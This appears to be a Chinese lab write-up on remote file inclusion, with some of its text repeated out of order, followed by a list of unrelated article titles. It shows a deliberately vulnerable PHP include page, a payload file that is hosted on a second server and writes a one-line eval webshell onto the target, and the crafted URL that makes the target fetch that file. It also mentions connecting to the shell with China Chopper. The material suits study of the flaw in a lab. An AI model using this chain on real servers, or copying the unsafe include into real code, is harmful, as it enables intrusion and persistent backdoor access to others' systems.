[基本实验] 远程文件包含
2015-07-26 15:50
246 查看
首先在自己的网站(10.0.3.88)中创建一个txt文件(test.txt),内容为:
随后访问存在漏洞的网站(10.0.3.82)并且构造特殊的URL:
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi.php是存在漏洞的网页
cforce.php
这是一个一句话木马,可以通过中国菜刀去连接,获得webshell。
实验完毕,通过远程文件包含获得一个webshell
在这个漏洞环境下,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。
<?php $payload = "<?php eval(\$_POST['123']);?>"; $myfile = fopen("cforce.php", "w") or die("Unable to open file!"); fwrite($myfile,$payload); fclose($myfile); ?>
随后访问存在漏洞的网站(10.0.3.82)并且构造特殊的URL:
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi.php是存在漏洞的网页
<?php if (isset($_GET["file"])) { @include($_GET["file"]); #readfile($_GET["file"]); } ?>在漏洞网站的根目录下,生成了一个新的文件cforce.php
cforce.php
<?php eval($_POST['123']);?>
这是一个一句话木马,可以通过中国菜刀去连接,获得webshell。
实验完毕,通过远程文件包含获得一个webshell
在这个漏洞环境下,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。
相关文章推荐
- 【SQL Server 2008 使用篇】无法连接到服务器
- 机房收费系统——上下机
- python编码笔记
- bootstrap javascript插件中类成员命名之最前面有无$
- ActiveMQ
- 深入了解MySQL
- 【Treap】【TYVJ 1728】普通平衡树
- ssh中“Host key verification failed.“的解决方案
- 源码编译lnmp(Nginx 1.8 + MySQL5.5 + PHP 5.3)
- Java 内存泄露 与 Reference
- HTML5基础18----HTML5实体
- HTML5基础17----HTML5背景
- 5. php 基本数据类型
- 【java】this()与super()使用详解
- HTML5——Day1
- ActiveMQ学习-Network connectors(1)
- Leetcode|Reverse Words in a String
- iOS中自定义UIImageView用TargetAction模式实现关灯小游戏
- 自己动手(二)──PullToRefresh之上拉翻页(3)
- 详解用CSS3制作圆形滚动进度条动画效果